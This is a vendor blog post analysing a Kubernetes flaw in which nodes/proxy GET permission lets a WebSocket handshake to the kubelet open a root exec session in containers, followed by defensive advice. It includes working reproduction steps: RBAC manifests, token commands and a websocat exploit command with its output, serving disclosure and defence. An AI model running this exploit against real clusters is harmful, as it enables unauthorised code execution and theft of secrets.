Your Monitoring Stack Just Became a RCE Vector: A Deep-Dive into the Kubernetes nodes/proxy RCE

Last week, security researcher Graham Helton published a report that a service account with nothing more than nodes/proxy GET permission can achieve full remote code execution (RCE) in any container on a Kubernetes node. This permission is routinely granted to monitoring tools like Prometheus, Datadog, and Grafana for metrics collection. Depending on the security configuration, this could lead to a full cluster takeover. 

We investigated whether workloads running under Edera's isolation were vulnerable. The short answer: they're not. But the longer answer is more interesting. It reveals why architectural decisions matter, why defense in depth isn't just a marketing buzzword, and why the Kubernetes community needs to think harder about secure defaults.

First, a Thank You to the Security Research Community

Before we dive in, we want to acknowledge Graham Helton's work. Security researchers who responsibly disclose vulnerabilities like this are heroes. They make the entire ecosystem safer, often without recognition or compensation. The Kubernetes community, and especially those of us running AI workloads, financial services, and healthcare applications owe researchers like Graham a debt of gratitude.

If you haven't read Graham's original post, we encourage you to do so. It's thorough, is a great introduction to some Kubernetes internals, and provides important context for what follows.

How a Kubernetes GET Request Turns Into Full Remote Code Execution

To understand this vulnerability, we need to cover some background on how Kubernetes handles container execution and how WebSocket connections work.

How Kubernetes Exec Works

When you run kubectl exec -it my-pod -- /bin/bash, there’s a lot that happens under the hood:

  1. Your kubectl client sends a request to the Kubernetes API server
  2. The API server checks your RBAC permissions for pods/exec CREATE
  3. If authorized, the API server proxies your request to the kubelet’s API endpoint on the node
  4. The kubelet connects to the container runtime (containerd, CRI-O, edera, etc.) to start the exec session
  5. A bidirectional stream is established for stdin/stdout/stderr

The key word here is CREATE. Executing commands in a container is considered a write operation, so it requires the create verb on the pods/exec RBAC resource.

The WebSocket Protocol Primer

WebSocket is a protocol that enables bidirectional communication over a single TCP connection. It's used extensively in Kubernetes for familiar operations like exec, attach, and port-forward

Crucially, WebSockets begin with an HTTP GET request. This is called the "upgrade handshake" and is defined in RFC 6455. The client sends a GET request with special headers, and the server responds with HTTP 101 (Switching Protocols) to upgrade the connection.

GET /exec/default/my-pod/container?command=id HTTP/1.1
Host: 10.0.0.5:10250
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
Sec-WebSocket-Protocol: v4.channel.k8s.io

The RBAC and WebSocket Mismatch That Enables RCE

Here's where things get spicy:

  1. The kubelet maps HTTP methods to RBAC verbs: GET → get, POST → create
  2. The /exec endpoint normally expects POST requests
  3. But WebSocket connections use GET for the handshake
  4. The kubelet sees a GET request, checks for get permission, and allows it
  5. The connection upgrades, and suddenly you have an all-powerful exec session

Result: If you have nodes/proxy GET permission, you can bypass the pods/exec CREATE RBAC requirement entirely. This matters because of how organizations treat these two permissions:

  • pods/exec CREATE is considered highly sensitive and security teams rightly audit it carefully. It's typically restricted to cluster administrators, on-call engineers, or specific debugging roles. Granting it broadly is a red flag in any security review.
  • nodes/proxy GET is considered read-only. It's routinely granted to monitoring tools, often across the entire cluster. Even mature security teams rarely take notice because it's typically just GET requests for metrics.

Read differently: your Prometheus service account, which you thought could only scrape metrics, can execute arbitrary commands as root into any container on any node it can reach.

A permission typically granted for observability becomes a permission for remote code execution.

Why nodes/proxy Exists and How It Can Be Abused

The nodes/proxy resource allows direct communication with the kubelet API. It's generally used for:

  • Metrics collection: Prometheus scraping /metrics and /stats
  • Health monitoring: Tools checking node health status
  • Log aggregation: Accessing container logs directly

Many orgs grant this permission broadly to their observability stack. A typical ClusterRole can look like this:

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: monitoring-role
rules:
- apiGroups: [""]
  resources: ["nodes/proxy"]
  verbs: ["get"]

It's just GET. Read-only. What could go wrong? When exploiting this vulnerability, everything. And Kubernetes maintainers have signaled that this is working as intended and won’t be patched.

Why Kubernetes Considers nodes/proxy RCE “Working as Intended”

When this vulnerability was reported to the Kubernetes Security Team, they determined it is "working as intended" and will not receive a CVE. Their position is that nodes/proxy has always been a privileged resource, and the proper fix is KEP-2862 (Fine-Grained Kubelet API Authorization), expected to reach GA in Kubernetes 1.36 (April 2026).

Step-by-Step: Reproducing the nodes/proxy RCE

We built a test harness to validate this vulnerability in our environment. Here's how to reproduce it in yours.

Step 1: Create a Service Account with Minimal Permissions

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: vuln-test-role
rules:
- apiGroups: [""]
  resources: ["nodes/proxy"]
  verbs: ["get"]
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: vuln-test-sa
  namespace: default
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: vuln-test-binding
subjects:
- kind: ServiceAccount
  name: vuln-test-sa
  namespace: default
roleRef:
  kind: ClusterRole
  name: vuln-test-role
  apiGroup: rbac.authorization.k8s.io

Step 2: Verify Permissions

# Generate a token for the service account
TOKEN=$(kubectl create token vuln-test-sa -n default --duration=1h)


# List permissions - look for "nodes/proxy" with "get" verb
kubectl auth can-i --list --token="$TOKEN" | grep nodes/proxy
# Expected output: nodes/proxy    []    []    [get]


# Verify we do not have pods/exec permission
kubectl auth can-i create pods/exec --token="$TOKEN"
# Expected output: no

Note: On EKS and other managed Kubernetes platforms, kubectl auth can-i get nodes/proxy may incorrectly return "no" due to webhook authorizer limitations. Use kubectl auth can-i --list instead, which correctly shows the granted permissions.

Step 3: Deploying a Target Pod for Exploitation

apiVersion: v1
kind: Pod
metadata:
  name: victim
  namespace: default
spec:
  containers:
  - name: victim
    image: python:slim
    command: ["sleep", "infinity"]
    env:
    - name: SECRET_API_KEY
      value: "super-secret-key-12345"
    - name: DATABASE_PASSWORD
      value: "production-db-password"

Step 4: Exploiting nodes/proxy for Remote Code Execution

From an attacker pod (or any machine with network access to the kubelet):

# Get a token for the service account
TOKEN=$(kubectl create token vuln-test-sa --duration=1h)

# Get the node's internal IP
NODE_IP=$(kubectl get node <node-name> -o jsonpath='{.status.addresses[?(@.type=="InternalIP")].address}')

# The exploit - using websocat to establish a WebSocket exec session
websocat -k \
  -H "Authorization: Bearer $TOKEN" \
  --protocol v4.channel.k8s.io \
   "wss://${NODE_IP}:10250/exec/default/victim/victim?output=1&error=1&command=id"

Result on standard containers:

uid=0(root) gid=0(root) groups=0(root)
{"metadata":{},"status":"Success"}

You now have RCE as root inside the container. From here, an attacker can:

  • Extract environment variables (secrets, API keys, database credentials)
  • Read mounted volumes (potentially including service account tokens)
  • Make network requests to internal services
  • Install persistence mechanisms
  • Attempt container escape via kernel vulnerabilities

Testing the nodes/proxy RCE Against Edera

It’s never a good feeling when your favorite distributed system is vulnerable to a massive remote code execution vulnerability. 

At Edera, we build on top of, and harden Kubernetes. But how did this vulnerability play out? Did our microVM container execution environment limit remote code execution to a single isolation domain?

To test, we deployed identical victim pods: one running on the standard containerd runtime, one running Edera’s edera runtime.

Exploit Result on a Standard Kubernetes Container Runtime

$ websocat -k --protocol v4.channel.k8s.io \
    "wss://${NODE_IP}:10250/exec/default/victim-standard/victim?output=1&command=id"

uid=0(root) gid=0(root) groups=0(root)
{"metadata":{},"status":"Success"}

Vulnerable. The attacker achieves RCE.

Exploit Result on an Edera-Isolated Container

$ websocat -k --protocol v4.channel.k8s.io \
    "wss://${NODE_IP}:10250/exec/default/victim-edera/victim?output=1&command=id"

HTTP/1.1 405 Method Not Allowed
Allow: POST

The request is rejected before reaching the container. Not vulnerable 😮‍💨

Why Edera Is Protected

Let's be transparent: this protection is a beneficial side-effect of Edera's architecture, not a feature we specifically designed to counter this vulnerability.

Edera implements the Container Runtime Interface (CRI) differently than traditional runtimes. When the kubelet forwards an exec request to the Edera runtime, our streaming endpoint (written in Rust and depending on zero Go components) only accepts POST requests. The WebSocket upgrade handshake, which arrives as a GET request, is rejected with HTTP 405 Method Not Allowed.

From the attacker's perspective, the request never gets far enough to establish a session. The runtime itself refuses to process it.

Comparing Exec Behavior Between Standard Runtimes and Edera

We can see this difference by testing the HTTP methods directly:

Alt text:  Comparison table with three columns labeled “Request,” “Standard containerd,” and “Edera Runtime.” Row 1: “POST /exec (normal kubectl exec)” — shows “Works” for both Standard containerd and Edera Runtime. Row 2: “GET /exec (WebSocket upgrade)” — shows “Upgrades to exec session” for Standard containerd, and “405 Method Not Allowed” for Edera Runtime. Row 3: “curl -X OPTIONS /exec” — shows “Returns allowed methods” for both Standard containerd and Edera Runtime.

Both runtimes support legitimate kubectl exec operations (which use POST through the API server). But only Edera blocks the direct WebSocket GET exploit.

But What If Edera Were Vulnerable?

This is where defense in depth becomes important. Let's imagine that Edera's exec endpoint did accept the WebSocket upgrade

The attacker would land inside a microVM with its own dedicated kernel.

Comparing Blast Radius: Shared Kernel vs Isolated MicroVM

Standard container compromise: Attacker has RCE in a container sharing the host kernel - Can see all processes on the node via /proc (if not properly namespaced) - Can potentially exploit kernel vulnerabilities to escape to the host - Can access shared resources (cgroups, network namespaces) for lateral movement - One compromised container can lead to a compromise of the entire node.

Edera container compromise: Attacker has RCE inside an isolated microVM - Cannot see processes from other pods or the host as there's no shared /proc - Kernel exploits affect only that microVM's kernel, not the host - No shared kernel memory, cgroups, or namespaces to abuse - The blast radius is contained to a single workload.

Why nodes/proxy RCE Is Especially Dangerous for AI Workloads

Organizations running AI inference services face a particular risk. These workloads often:

  • Hold model weights worth millions in R&D investment
  • Have access to GPU resources (high-value targets)
  • Connect to data pipelines containing sensitive training data
  • Run with elevated permissions for performance reasons

A single container compromise in a standard Kubernetes cluster could lead to model exfiltration, data theft, or corruption of inference results. With Edera's isolation, even a successful exec exploit cannot reach beyond the boundaries of the compromised microVM.

When Kubernetes Won’t Patch: Understanding the Real Risk

Earlier, we mentioned that the Kubernetes Security Team determined this behavior is "working as intended." Here's the full context of their response:

Following further review with SIG-Auth and SIG-Node, we are confirming our decision that this behavior is working as intended and will not be receiving a CVE. While we agree that nodes/proxy presents a risk, a patch to restrict this specific path would require changing authorization in both the kubelet (to special-case the /exec path) and the kube-apiserver (to add a secondary path inspection for /exec after mapping the overall path to nodes/proxy) to force a double authorization of “get” and “create.” We have determined that implementing and coordinating such double-authorization logic is brittle, architecturally incorrect, and potentially incomplete.

We remain confident that KEP-2862 (Fine-Grained Kubelet API Authorization) is the proper architectural resolution. Rather than changing the coarse-grained nodes/proxy authorization, our goal is to render it obsolete for monitoring agents by graduating fine-grained permissions to GA in release 1.36, expected in April 2026.

The Kubernetes Security Team

Why Kubernetes Rejects a Patch for nodes/proxy

The Kubernetes Security Team's reasoning is thoughtful:

  1. Architectural integrity: A targeted patch would require coordinated changes across multiple components with special-case logic. This is the kind of complexity that could lead to future vulnerabilities.
  2. Proper fix exists: KEP-2862 introduces fine-grained permissions (nodes/metrics, nodes/stats, nodes/log) that give monitoring tools least privileged access without the exec capability.
  3. Deprecation path: Once KEP-2862 reaches GA and sees adoption, nodes/proxy can be deprecated for monitoring use cases.

Why the Risk Has Changed Since nodes/proxy Was Designed

We understand the difficult tradeoffs the Kubernetes security team has to navigate for features with a large blast radius and complexity. KEP-2862 is genuinely the right long-term solution.

But we believe the risk calculus has changed.

KEP-2862 is expected to GA in April 2026. After that, it requires adoption across the entire ecosystem. Monitoring tools need to update their RBAC requirements, Helm charts need revision, and cluster operators need to migrate. Realistically, most production clusters won't have this protection until 2027 or later.

Kubernetes doesn’t just run stateless web apps. It's running AI training pipelines with proprietary model weights, financial trading systems, and healthcare applications with patient data. The blast radius of a monitoring stack compromise in 2026 is categorically different from 2016.

This vulnerability illustrates a difficult truth: you cannot rely solely on upstream security to protect your workloads. This is why architectural isolation matters. It's not about mitigating vulnerabilities, it's about building systems that remain resilient to compromise even when vulnerabilities exist, and even when patches aren't coming.

How Operators, Maintainers, and Vendors Should Respond

For cluster operators: 

  1. Audit your RBAC policies for nodes/proxy permissions immediately
  2. Consider whether monitoring tools truly need direct kubelet access
  3. Implement network policies restricting access to kubelet port 10250
  4. Plan your migration to KEP-2862 fine-grained permissions when they GA
  5. Adopt workload isolation technologies that limit blast radius regardless of upstream decisions

For the Kubernetes project:

  1. Prioritize KEP-2862 adoption and provide clear migration guides
  2. Consider whether new clusters should default to fine-grained authorization
  3. Document the security implications of nodes/proxy more prominently

For the industry:

  1. Recognize that the era of "detect and respond" is insufficient for container security
  2. Recognize that upstream maintainers, even excellent ones, cannot protect you from every threat
  3. Invest in isolation technologies that make successful exploits containable
  4. Assume vulnerabilities will exist, and architect systems to contain them
  5. Treat defense in depth as a requirement, not an option

nodes/proxy RCE Proves Why Architectural Isolation Matters

The nodes/proxy GET vulnerability is a reminder that distributed systems security is hard. Even benign permissions become attack vectors when combined with protocol idiosyncrasies. And sometimes, even when you report these issues, upstream maintainers make reasonable decisions that still leave your workloads exposed.

Edera happens to block this particular exploit due to architectural decisions in our CRI implementation. But the deeper lesson isn't "use Edera", it's that defense in depth works. When you isolate workloads at the kernel level, even novel vulnerabilities become containable events rather than cluster-wide compromises.

The Kubernetes community has an opportunity to build systems that are resilient and secure by default. KEP-2862 is a step in the right direction. But until secure defaults are the norm, and even after they are, architectural isolation remains your last line of defense.

We hope this analysis contributes to that conversation and encourages the ecosystem to think beyond "patch or don't patch" and toward "how do we contain the blast radius when things go wrong?"

Thanks again to Graham Helton for the original vulnerability research.

Have questions or want to discuss isolation strategies? Reach out to us at security@edera.dev.

FAQ

What is the Kubernetes nodes/proxy RCE vulnerability?

The nodes/proxy RCE vulnerability allows attackers with GET access to nodes/proxy to establish WebSocket exec sessions and execute arbitrary commands inside containers.

Why is nodes/proxy considered dangerous?

Although often treated as read-only, nodes/proxy grants direct access to the kubelet API, which can be abused to bypass RBAC protections.

Are monitoring tools like Prometheus affected?

Yes. Monitoring tools are frequently granted nodes/proxy GET permissions, making them potential attack vectors if compromised.

Why won’t Kubernetes patch this vulnerability?

The Kubernetes Security Team considers this behavior “working as intended” and plans to address it through fine-grained kubelet authorization (KEP-2862).

How does isolation change the impact of this RCE?

With isolated runtimes, even successful exec exploits are contained within a single workload and cannot compromise the node or other pods.

Cute cartoon axolotl with a light blue segmented body, big eyes, and dark gray external gills.

You know you wanna

Let’s solve this together